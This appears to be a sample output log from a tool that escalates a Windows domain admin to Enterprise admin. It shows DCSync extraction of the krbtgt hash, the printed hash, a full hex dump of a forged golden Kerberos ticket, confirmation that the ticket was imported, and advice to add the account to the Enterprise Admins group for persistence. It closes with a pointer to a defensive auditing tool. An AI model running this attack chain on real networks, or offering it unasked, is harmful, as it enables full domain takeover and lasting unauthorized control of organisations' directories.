Example of successful execution:
======================================================================
/\ Elevated domain admins to Enterprise admins - version 1.0
||
/||\ Require: domain admin right
|:||:| or more specifically DS-Replication-Get-Changes-All
|/||\| Vincent LE TOUX ([email protected])
======================================================================
This will execute:
- dcsync to extract the krbtgt password
- build a golden ticket
- import it
Once succeed, you will have to add the account in the Enterprise admin group for persistence
======================================================================
krbtgt hash
291EF75550A20FE901F81B124B4E4DD4
golden ticket
76840000059D308400000597A08400000003020105A18400000003020116A2840000041930840000041361840000040D308400000407A08400000003020105A184000000171B15746573742E6D79736D6172746C6F676F6E2E636F6DA2840000003A308400000034A08400000003020102A1840000002530840000001F1B066B7
2627467741B15746573742E6D79736D6172746C6F676F6E2E636F6DA3840000039B308400000395A08400000003020117A18400000003020102A2840000037D048203794BE30E2DC2959826599DCD56A156836ED24CA3B70F642B567A609C45D6AB11583626B6BDE2F6FFC23DCB67805B467C08F00315E1F1DEE8F26FD595E314
F9566CE4C3C4F8D75561791073FB3B768E1B748FDCF76CC5F5FA80CED882DEB5CFE4E14525E2265EF11A7DB198E4DD140762BBD4CDD334FD443CC8AFE8A92AF54B494FA0C861E3219048E5808E3D151EB11BB83EBE64EEA2EC4CBD2C1A97D8D4A238E69DA4B5E31E8A5ECA389748EE133329E9E28BE786C4C8A0531F61FDB0A6F
07751102D09524F298FBE1EACA7F1EF5B0CD93CF00EBF49FE0C44A8E1171CD85CCB8E18EDD8EE1C2F87C00E29F0D7B62432734EDE68DF98A772CCDFFAFAF40D69E16B1965D70E32BA834502C723F3B4A5395477BE619A837F911A489E404378AC7B05632FB8444B949A29FB07DAC65DAB06E01C1E6A83CF1850A85779F4010742
B586D1D06918E96F7E92F8076B84DE7387591A63E77C5097ABA8FD8B9341EC44CED24519DE08440056489A6D145D3910DB49668F8302E82FD57B31894EB4E497CA7DA7D86E7F4F0705A674199D6A8423B9D6A14F018E1603958D2467BE90AB52B7C3735FBEF7A534FB56FB13F22BF2EABF4A563CF157AE8E07D1FAFE1F248340F
1664D1B815D9BB78328DC71D159382DE6BFB6A4FB604989775FEDAE488CED6BC5C4682B9D5C3E9A051FF49D1E5B18E48A8AB136B562A514A657C1CFD9487C82B88827CF88E5E54DD9F09204A9A78A504CAC09046D38DED340930B03B923CD5C51008F583BBC1412CD17B3AEA0344BF314D53CDF1FC452CB6879A18642FCBEAA90
293AF7F09D74DDFCE8239D97C4DA61141BA71CB0BCC8390977221F204B9C1517E691A8BC77FB8C518E7C9D5F1BB43EA65048A6065C1641A82EA799F5AF4E6A10BE05638F9615BA36C063F1BA61A192E5A31C5343E7B1DD032C53A0B7589843AF908EEC3B8D12186DEAD1B199DF1EBA8A9A65970C5083BF21D21D9F78F3B519697
3D9BD3990E79FABE85669CC9E5B5ACE36AB5ABE7713778D83B5284C376DAE0779914F92AFE71C7965773B765AE9AC68B5BEFD4AEC3312AB14AF3435294C95D252ADBD308CC59AE05938B089CBCB3E66F874501B8EC526D0FEB0B7362B4D802D0E0FBB70291B086E875C9BB74C7155027607BAC843FCE981D72BF1B12A1BD9A350
3BA82D506F7A93C179200AE50B5A42BCFA5A18E2704250047498364FB8E7AF50AF4D2D0725425721743C3F5F2F49A699BDD31B3D02A6FA9266A3840000016030840000015AA08400000003020100A2840000014B048201477D840000014130840000013BA0840000013530840000012F308400000129A08400000027308400000
021A08400000003020117A184000000120410ED609578C65E0358BB3C5F231A8A14FCA184000000171B15746573742E6D79736D6172746C6F676F6E2E636F6DA2840000002A308400000024A08400000003020101A1840000001530840000000F1B0D41646D696E6973747261746F72A3840000000703050040E00000A5840000
0011180F32303136303832363136323733395AA68400000011180F32303236303832363136323733395AA78400000011180F32303236303832363136323733395AA884000000171B15746573742E6D79736D6172746C6F676F6E2E636F6DA9840000003A308400000034A08400000003020102A1840000002530840000001F1B0
66B72627467741B15746573742E6D79736D6172746C6F676F6E2E636F6D
Ticket imported
======================================================================
You got promoted Enterprise admin (when connecting to other computers)
Have a nice day
...
For solutions, do not forget to check [PingCastle] (https://www.pingcastle.com)